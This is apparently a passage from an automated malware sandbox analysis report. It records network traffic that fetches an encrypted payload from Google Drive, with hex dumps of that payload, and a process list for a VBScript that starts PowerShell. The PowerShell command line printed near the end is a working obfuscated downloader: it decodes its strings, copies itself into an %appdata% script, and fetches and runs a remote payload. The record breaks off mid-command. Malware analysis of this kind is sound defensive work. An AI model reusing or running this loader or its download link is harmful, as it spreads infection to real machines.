                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.949712142.251.2.132443316C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-24 04:46:58 UTC258OUTGET /download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          2024-04-24 04:46:59 UTC4744INHTTP/1.1 200 OK
                                                                          X-GUploader-UploadID: ABPtcPqMhVMxayIs-uns-kmlIW3i0H2v2SN3tD21_m0liOQMpeRclxbffnVym36aqjhAYweX1ss
                                                                          Content-Type: application/octet-stream
                                                                          Content-Security-Policy: sandbox
                                                                          Content-Security-Policy: default-src 'none'
                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                          X-Content-Security-Policy: sandbox
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                          Cross-Origin-Resource-Policy: same-site
                                                                          X-Content-Type-Options: nosniff
                                                                          Content-Disposition: attachment; filename="DWKhs242.bin"
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Credentials: false
                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 244800
                                                                          Last-Modified: Wed, 24 Apr 2024 01:15:42 GMT
                                                                          Date: Wed, 24 Apr 2024 04:46:59 GMT
                                                                          Expires: Wed, 24 Apr 2024 04:46:59 GMT
                                                                          Cache-Control: private, max-age=0
                                                                          X-Goog-Hash: crc32c=2n0xsg==
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-04-24 04:46:59 UTC4744INData Raw: 52 0f 83 58 e7 47 bc d7 6e 25 0e 2c fe ee dc 66 40 d1 6b 10 b2 bc 33 fb 0e ea 21 74 01 e2 32 05 be 86 e3 19 96 6e 40 1e 09 5b c6 d3 11 cb f1 50 17 a1 c1 49 f5 4a 35 20 43 db 84 ee d5 fc 36 ac 2c 88 4d ce 1f c8 fd f4 4d 8d c9 51 3a 29 08 b7 1c 92 f8 ea 39 38 1d 92 80 00 77 5c a3 a9 cf 09 e0 b8 2b 41 c0 f4 41 ec 64 55 cc 2b ea 3d f5 11 64 b6 3e 34 56 6a 4f 5e 8a a8 83 21 11 72 cf ff 6d 02 6d 70 1e f6 4f 66 75 54 aa a4 b6 32 1c 01 48 14 0b 42 e2 47 dd 72 6b 8a f2 23 4e cd 00 ab 45 b7 ee 5d 9c ad bc 26 f4 ae 97 d9 fb 17 23 55 7c 2a f7 da f7 9b 8f c0 ee e5 5b 33 57 95 7e 51 22 f9 88 7a 1a 53 b5 78 9c 60 b7 27 f1 13 1d a5 dd 94 32 b0 ef b6 88 cc dd 70 e2 61 7a a0 47 1c 94 93 2a 85 3f 8e 7f 55 73 c6 8a f6 b6 00 c1 9d 7e 54 8f ab 6b 8c ab 1b e5 e0 e4 32 b5 8b 26
                                                                          Data Ascii: RXGn%,f@k3!t2n@[PIJ5 C6,MMQ:)98w\+AAdU+=d>4VjO^!rmmpOfuT2HBGrk#NE]&#U|*[3W~Q"zSx`'2pazG*?Us~Tk2&
                                                                          2024-04-24 04:46:59 UTC4744INData Raw: b4 72 aa 52 82 eb 1b e5 e8 ec 30 b5 8f 06 96 47 9c 62 98 7a df 42 45 cc c3 88 ca 7d 3b d4 49 37 3b 9d 94 b7 32 f3 2c 8b c1 8d da cf bf 06 98 ce 60 04 6b 7e 89 7c 46 29 5b 18 fa 03 e4 21 6f 1f 24 65 1c 78 88 06 1c 58 9f 56 9b d9 13 6d 8e 85 8f 2f d8 36 9c 08 1a 98 ad 29 00 ed 87 4e 14 40 2d d3 32 e1 d1 1e e2 b0 e7 4b 43 c3 42 2c ab 1b 81 c4 cd ce 4c 3f ea 9e 7b de bf 55 79 c5 54 5a 19 f5 5e 87 9a 5d b2 f4 46 9c 7d 68 2e 8b c1 bd 45 3b 28 4f f7 70 2f 43 f5 49 22 c9 f9 8e 32 fe f0 4d a8 6a bd 91 7d 44 0f 35 17 88 33 8d 82 94 33 62 75 c4 d6 b9 15 88 92 c8 c8 c6 33 e9 5f 29 11 30 17 49 34 e0 a0 85 eb a0 78 f9 b4 cb 6e 2f 5b 79 54 0a 93 8a 95 62 f7 31 9f 7e 67 f0 21 4f e6 0e be 8f c0 2e 2c 09 6e b2 00 9b 5a 91 ef 74 32 af 04 21 d9 02 aa 75 88 bc d8 8c 42 d0 c4
                                                                          Data Ascii: rR0GbzBE};I7;2,`k~|F)[!o$exXVm/6)N@-2KCB,L?{UyTZ^]F}h.E;(Op/CI"2Mj}D533bu3_)0I4xn/[yTb1~g!O.,nZt2!uB
                                                                          2024-04-24 04:46:59 UTC467INData Raw: ae 0f 21 d9 02 aa 0e 72 43 27 86 4b e0 c2 cb 5d 9b 54 14 f7 c1 43 aa b8 bf 55 00 bc 1b 53 c9 71 a3 cf 4d 8d 01 f8 ac 33 a9 84 4b 5f ea 7a ea 4f da 36 a3 cc 19 e7 9f ea 8e cf 5a c7 01 ec 9b 79 db 6d 12 19 5a 82 19 c1 d1 a6 64 4f 48 63 91 dd 86 cb 42 1c 2c 62 f3 27 03 ef ec 56 56 89 76 6d 7c d1 92 3b 80 9f 2a 62 64 1a a5 28 72 08 0e dd eb 57 b3 6e 1e 53 2b 4d b7 6b 23 f1 3f 38 1d 5c a2 52 e2 78 1d 1f 8c bf 1a af 30 0f e5 df 60 53 a4 98 29 dc 2a 3d c4 ea 06 80 71 1f 86 41 63 7f 54 c9 0f 54 93 e7 27 8d 6d 9f 3b 0f d0 cf d8 43 dd 1d 06 e0 61 1a c6 e7 7c f7 a9 df c4 b7 10 45 f7 d8 b1 a8 c2 83 5d ef 72 ea 22 97 d2 f8 5e f1 02 51 a5 47 c2 5a 2f 20 1d af 78 bc 9c 10 b0 83 85 5c 85 31 50 d5 ae 29 2c 04 e2 f6 d1 9f 5f b7 2b ed 07 a3 97 45 50 1d 3a e6 a5 88 31 0c 11
                                                                          Data Ascii: !rC'K]TCUSqM3K_zO6ZymZdOHcB,b'VVvm|;*bd(rWnS+Mk#?8\Rx0`S)*=qAcTT'm;Ca|E]r"^QGZ/ x\1P),_+EP:1
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: 3a bf d2 43 ca 86 af 4c 7a 8d 03 07 74 f4 54 06 b1 e7 8a 9c f6 94 98 e2 07 ac 6b cd 8e 61 c5 21 8d f6 cc e4 a1 6e 72 f8 82 4a 52 2d 66 f9 c7 bc 6f c1 00 3e 4c f4 ef b7 93 e1 db 71 93 b8 38 85 2e 45 7d b2 58 2e 9b 2f a2 69 e6 f0 1a bc 28 8a 46 75 f9 e7 ab 1e ae 78 a0 b1 65 69 7d 96 d2 f3 fe 67 38 9f 6a e3 de a1 77 28 be 05 dc 97 62 95 b1 8f 49 f1 63 f0 40 9f 0d 26 24 6c 03 05 e9 0a 76 2f 12 c2 e8 4b eb ea 37 3a af 2b d3 9a ed 9c 82 58 f8 6a 71 52 29 36 00 95 65 dd 54 60 67 cc e0 5c 2b ff 04 c9 07 74 70 24 12 aa d9 a5 b7 dc 18 36 f0 9f ce b2 68 33 c2 84 90 5b 39 da 6b e1 a5 39 32 d0 0b 71 2b 07 5a 1a 53 69 44 b0 4f a7 c2 ea d5 e6 a7 75 06 54 d1 b8 90 47 2a 5d 5d 55 9b cf 28 05 53 2d 75 95 60 e9 b5 bb a6 fe d7 83 2e 6d b9 81 1f 4d 45 7e d2 0d e8 d6 90 64 fb
                                                                          Data Ascii: :CLztTka!nrJR-fo>Lq8.E}X./i(Fuxei}g8jw(bIc@&$lv/K7:+XjqR)6eT`g\+tp$6h3[9k92q+ZSiDOuTG*]]U(S-u`.mME~d
                                                                          2024-04-24 04:46:59 UTC67INData Raw: 15 b0 83 88 61 c3 4f 77 d5 50 21 d8 08 a2 fb be c6 5f f1 21 13 0b 87 68 d5 f5 d2 3b ec 78 27 cc f3 ee ca 35 d0 d9 4b bd 93 62 a7 0c fb f7 9b fd 3e 81 c8 d8 7e 59 ea d6 4a 85 0e 38 ea 34 22 a8 3d 52 c2
                                                                          Data Ascii: aOwP!_!h;x'5Kb>~YJ84"=R
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: c8 e2 06 12 db e1 71 48 a8 8b 0f d5 89 47 21 7f f4 e1 8a 51 b7 be 19 06 5c 68 13 91 3e 0d 56 11 82 0c 18 d2 d6 ec 60 69 ef b2 0a 61 a0 bb 56 f3 d1 7a 99 47 93 5d fc b4 46 2e 82 0f b4 d5 bd bb 35 30 f1 28 0a 58 26 bd 89 48 3d 6b ae 48 dc 91 63 55 96 58 11 ee 2f 85 88 73 1e 49 4c df 9d 95 49 24 e6 38 e8 33 10 4a 9f 21 1c 09 e7 93 2e 6f be 3b 20 67 70 24 ae 62 72 95 1c 20 44 e2 c1 f3 6e c8 cb a4 a0 b1 97 a8 b6 07 d6 7e 8e 51 73 0f c2 9e 55 ab fb 36 01 96 ea 3c 3e 25 5e f6 b1 0a e3 99 97 d1 54 89 2f 11 bb 0c 1a 7d 00 7c 31 07 7f df 92 32 b5 c2 43 d1 b6 c7 14 3e cf 03 07 76 0a 5a 13 91 c7 8f 9c f6 6a 68 ed 0b 94 5a 33 82 6d c5 ff 86 f7 cc c4 5f 6f 4b f6 7c 4b 6b 1f cc 05 38 43 6f c8 00 3e 4c f4 ef ba 93 e1 db 71 9e b8 38 89 2e 45 7d b2 58 2e 90 2f a2 69 e6 c5
                                                                          Data Ascii: qHG!Q\h>V`iaVzG]F.50(X&H=kHcUX/sILI$83J!.o; gp$br Dn~QsU6<>%^T/}|12C>vZjhZ3m_oK|Kk8Co>Lq8.E}X./i
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: 53 5f e0 52 01 41 d6 3c 5d 3c 16 eb 61 c7 83 cf 72 a3 ff ed a8 9c d7 6d 12 be 76 8c 19 e9 ed cc 58 4b c4 20 91 fd 86 35 4c 1c d2 4c fd 27 de bf 12 58 5a 54 70 93 70 dd b4 c6 95 9f 2a 62 ba 1b 9c 26 72 22 2e e7 35 54 b3 90 30 41 2b 4d 49 99 29 fd 1f 38 e3 50 ae ac c3 60 17 1f 8c 41 1b b6 27 0f e5 df 60 51 a9 98 46 1f 26 39 ce 34 0a 80 71 3f 5a 40 5a 7a aa c7 03 6c 96 19 2b 81 55 f0 c6 f0 2f 31 2a 43 e4 17 07 f0 61 e4 ca e6 63 98 c2 ab c4 bb 63 87 f4 d9 d2 f7 fe 83 69 e7 8c e4 2c 97 f2 ea 7e f1 02 af ab b5 cc 5e d1 14 ef ae 58 ba 9c ee bc 79 84 45 c5 31 50 d5 ae 24 1f 1c a7 fb d1 61 53 f3 2b cd 03 83 68 ba dd d7 3e e6 d5 83 ec f4 ee ec e8 2e d7 4f bd ed be ab 08 ff ff 6b fc 3e 87 1c d9 47 4e ab b2 4a 7b 03 3b ea 1c 91 a8 3d 58 7d 73 e3 06 49 fa ed 71 4e a8
                                                                          Data Ascii: S_RA<]<armvXK 5LL'XZTpp*b&r".5T0A+MI)8P`A'`QF&94q?Z@Zzl+U/1*Cacci,~^XyE1P$aS+h>.Ok>GNJ{;=X}sIqN
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: f3 2c f5 e8 ad d9 cb d0 58 66 c0 61 24 66 80 85 7b b8 07 5a 18 fa fd 16 20 56 28 2f 65 1c 0a 05 01 25 3b ec 26 9b aa 44 93 80 83 0f 0c da 36 98 28 e8 96 aa 29 fe 1d 8b 49 14 9e 21 d3 32 c1 27 1f db ba 19 4a 7a d0 62 2d ab 68 d3 3a c3 cf cc 3d 14 92 78 fe 96 56 79 c5 aa aa 18 cc 5b 79 96 5d 8a d1 43 9c 7d 50 70 77 07 4c bb 37 2c 67 fe 70 6e 39 d5 4f 20 c9 f9 70 05 fe f0 4d 9c 66 bd 91 5e 46 0f 35 04 76 32 b4 91 94 33 62 5f ee d6 b9 3f b1 45 37 d8 39 13 ed 44 28 11 ce 0a 49 34 e0 5e 89 eb a0 58 f9 b4 cb 71 d1 5a 40 4a 0b 93 8a a6 43 f6 31 90 7e 99 fe 20 4f e6 f1 b0 8f c0 0e 3e 09 6e b2 d6 9b 63 94 a8 75 32 97 12 21 d9 02 92 46 76 43 25 a6 51 e0 b5 ca a3 95 2f 14 f7 3f a1 a7 b8 9f 51 00 bc 1b ad c8 48 ad dc 7d 8e 39 c8 a9 33 a9 aa 53 5f fb 5a 14 41 d6 36 5d
                                                                          Data Ascii: ,Xfa$f{Z V(/e%;&D6()I!2'Jzb-h:=xVy[y]C}PpwL7,gpn9O pMf^F5v23b_?E79D(I4^XqZ@JC1~ O>ncu2!FvC%Q/?QH}93S_ZA6]
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: 61 d3 fc 3c 3f 73 20 bc 3f 6c f9 5d 76 81 b7 42 b6 85 3c 2a db be 9e 11 0c b2 93 8c 9b ad 3b 63 60 eb c2 ce 1c c8 03 f8 48 8d 37 58 c4 d6 20 c4 a4 92 f2 9e 2d 38 1d 90 3e 0e 75 5c 83 ad cf 09 e0 46 25 42 c0 f4 bf e0 67 55 ec 2a ea 3d f5 ef 65 8f 28 34 56 6a b1 57 8a a8 f8 45 91 72 cb 01 6d 1d d7 5e 1c 42 46 ab aa e2 a8 e8 7b ed 44 6a 21 47 2b 32 90 28 44 01 33 ed d2 40 2f a3 4e c5 31 97 8c c6 b2 dc c9 48 2a cb fa f9 9f 5e 70 75 11 bb 92 86 dc 96 82 ca f2 e0 5b 33 57 ad 88 af 8d 43 a2 7a 56 52 a5 48 59 15 fe 43 f1 13 0d a5 dd 85 12 b0 0f b6 8a 33 d8 72 e9 59 67 10 44 1c 94 65 26 86 3f ae 7c 55 8d 16 77 f7 8f 10 c1 9d 7e 4a 80 a9 6b ac eb 1a e5 c0 bd 77 b3 89 26 94 05 9c 62 66 74 de 42 45 d8 ce 88 ca b7 36 d4 49 75 c5 9c ad a4 33 f3 2c d5 c6 8d da cb 2e 56
                                                                          Data Ascii: a<?s ?l]vB<*;c`H7X -8>u\F%BgU*=e(4VjWErm^BF{Dj!G+2(D3@/N1H*^pu[3WCzVRHYC3rYgDe&?|Uw~Jkw&bftBE6Iu3,.V
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: df 2a 15 4b d6 2b 8b e8 02 a4 b6 5e dc b4 9f ce f4 c8 15 3a 6e f9 13 da ad fd c2 61 df f5 4e eb af 9d 0e 97 e2 6f 2a 1e b5 9e be 4a 56 2d c3 eb 51 78 b3 05 e1 ba 9d f1 ec 45 39 e7 ba 92 6e 66 7f 29 ab 6e e5 2b 48 2e 3b 4b c0 25 ca 2b b9 d8 aa 47 67 6e 59 85 fb 29 f8 6a 68 af 71 f9 32 49 1c c2 01 fe 56 bd dc cd e7 72 61 55 de b3 59 c9 c4 06 97 d1 74 f9 6f 34 9d 88 1a d1 85 b4 a6 5d b1 30 e4 45 82 e5 c8 ee 36 7a 88 64 c8 3f 3c 48 1b fb d1 92 11 d4 ac e9 7a 81 fc 1d 85 ec ca 1d 3a d0 d7 b2 56 9f 7d 0b d0 41 34 8d 18 b3 ca ce 20 26 36 e7 b5 4f 29 50 37 45 52 1a 13 8f 0e c8 67 5e 8f 10 d1 89 38 1f 52 8b 64 77 1e 75 29 d7 7f 89 7e 02 5f 57 d0 ef 13 4f 09 ab 71 d2 90 19 f0 75 13 bd 01 fa d1 3a 99 ea 25 0b e1 31 61 7f f1 be 0c 78 7c 4c 72 a8 8e 3c c1 7b 4f db c1
                                                                          Data Ascii: *K+^:naNo*JV-QxE9nf)n+H.;K%+GgnY)jhq2IVraUYto4]0E6zd?<Hz:V}A4 &6O)P7ERg^8Rdwu)~_WOqu:%1ax|Lr<{O


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:1
                                                                          Start time:06:46:03
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs"
                                                                          Imagebase:0x7ff70f220000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:06:46:03
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') 